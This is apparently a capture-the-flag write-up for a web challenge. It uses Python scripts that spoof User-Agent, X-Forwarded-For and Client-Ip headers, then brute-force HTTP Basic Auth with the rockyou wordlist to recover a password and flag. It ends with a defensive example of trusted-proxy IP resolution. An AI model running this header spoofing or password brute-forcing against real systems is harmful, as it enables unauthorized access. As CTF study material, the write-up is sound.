# 12002-Monster

> http://ctf.adl.tw:12002/

## Intro

On arrival, all you see is

![](https://i.imgur.com/Ulz9AUj.png)

ok gogo python :snake:

## You must use STARRYBrowser

Write the request in Python and set the `user-agent`.

```python
import requests

headers = {
    'user-agent': 'STARRYBrowser',
}
response = requests.get(
    url='http://ctf.adl.tw:12002/',
    headers=headers
)
print(response.content.decode('utf-8'))
```

GET

![](https://i.imgur.com/ARa7IMG.png)

## You must come from 127.0.0.1

Set `X-Forwarded-For` (this challenge does not require setting `host`).

```python
headers = {
    'user-agent': 'STARRYBrowser',
    'X-Forwarded-For': '127.0.0.1',
}
```

GET

![](https://i.imgur.com/KAFmVkl.png)

## You must speak Japanese and you must be in Japan.

Look up some Japanese IP addresses.

![](https://i.imgur.com/KgxnyGa.png)

Pick any one of them, then set `Client-Ip` and `Accept-Language`.

```python
headers = {
    'user-agent': 'STARRYBrowser',
    'X-Forwarded-For': '127.0.0.1',
    'Client-Ip': '3.112.97.0',
    'Accept-Language': 'ja-JP',
}
```

GET

![](https://i.imgur.com/os58Mcf.png)

`bocchi & 🤘rockyou!!!`

## Now, you must login

Going to `/admin` shows that the site uses HTTP Basic Authentication for login. This simply encodes the username and password as base64, prefixes the result with `Basic`, and puts it in the `Authorization` field of the header.

In Python, the implementation is:

```python
from base64 import b64encode

# Basic Auth func
# https://stackoverflow.com/questions/6999565/python-https-get-with-basic-authentication
def basic_auth(username, password):
    token = b64encode(f"{username}:{password}".encode('utf-8')).decode("ascii")
    auth = f'Basic {token}'
    return auth

headers = {
    'user-agent': 'STARRYBrowser',
    'X-Forwarded-For': '127.0.0.1',
    'Client-Ip': '3.112.97.0',
    'Accept-Language': 'ja-JP',
    'Authorization': basic_auth('testusername', 'testpassword')
}
```

Trying every combination of `bocchi & 🤘rockyou!!!` as the username and password failed.

![](https://i.imgur.com/zLUuJpO.png)

After a long time of **guesswork** and a **hint from the TA**

> ![](https://i.imgur.com/HVhfkPf.png)

we found:

![](https://i.imgur.com/iqg2QCE.png)

> https://github.com/brannondorsey/naive-hashcat/releases/tag/data

This is a 133 MB password dictionary with `14344391` entries in total.

Since `rockyou` refers to the password, we use the username `bocchi` and enumerate passwords from this file as blind guesses.

```python
# Stream the wordlist line by line instead of loading the whole file into memory
with open('rockyou.txt', 'r', encoding='latin-1') as wordlist:
    for count, line in enumerate(wordlist, start=1):
        s = line.strip()
        print("{}) try: bocchi & {}".format(count, s))
        headers['Authorization'] = basic_auth('bocchi', s)
        response = requests.get(url='http://ctf.adl.tw:12002/admin', headers=headers)
        # The rejection page contains this message; any other response means the login passed
        if 'You have not been verified' not in response.text:
            print('Find! ', s)
            break
```

After running it overnight, I woke up to find that it had actually found the password!

![](https://i.imgur.com/bSmTEoz.png)

Print the page content using this username and password:

```python
headers['Authorization'] = basic_auth('bocchi', 'bocchio')
response = requests.get(url='http://ctf.adl.tw:12002/admin', headers=headers)
print(response.text)
```

![](https://i.imgur.com/PYFXoIn.png)

![](https://i.imgur.com/4YhyFxq.png)

> flag: `ADL{g0men_Im4OK4N3Naik4ra_0BOte_https://youtu.be/Gc3NKC8TQtY}`
> ![](https://i.imgur.com/eauZqf0.png)
> bocchi and foohow
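
The "come from 127.0.0.1" and "be in Japan" checks above pass because `X-Forwarded-For` and `Client-Ip` are set freely by the client. As an added example (not part of the original writeup or the challenge's code), here is one way a server can resolve the client address so that forwarding headers count only when a known reverse proxy supplied them. The proxy network `10.0.0.0/24`, the function names and the sample addresses are assumptions.

```python
import ipaddress

# Assumption: the only reverse proxies allowed to vouch for a client address.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]

# Constructed sample: the spoofed headers used in the writeup above.
SPOOFED_HEADERS = {
    "user-agent": "STARRYBrowser",
    "X-Forwarded-For": "127.0.0.1",
    "Client-Ip": "3.112.97.0",
}


def is_trusted(addr):
    return any(addr in net for net in TRUSTED_PROXIES)


def resolve_client_ip(peer_ip, headers):
    """Return the address to use for access decisions.

    peer_ip is the TCP peer of the connection; headers is the request header dict.
    Client-Ip is never consulted: nothing on the path authenticates it.
    """
    peer = ipaddress.ip_address(peer_ip)
    # Direct connection from an untrusted peer: every header is client-controlled.
    if not is_trusted(peer):
        return str(peer)
    # Each trusted proxy appends the address it saw, so walk the chain right to left
    # and stop at the first hop that is not one of our own proxies.
    xff = next((v for k, v in headers.items() if k.lower() == "x-forwarded-for"), "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: fall back to the last verified hop
        if not is_trusted(addr):
            return str(addr)
        peer = addr
    return str(peer)


def is_local_request(peer_ip, headers):
    # The "must come from 127.0.0.1" check, based on the resolved address only.
    return ipaddress.ip_address(resolve_client_ip(peer_ip, headers)).is_loopback
```

With this resolver, the spoofed `127.0.0.1` entry is either ignored (direct connection) or sits to the left of the address the trusted proxy appended, so it never becomes the resolved client address.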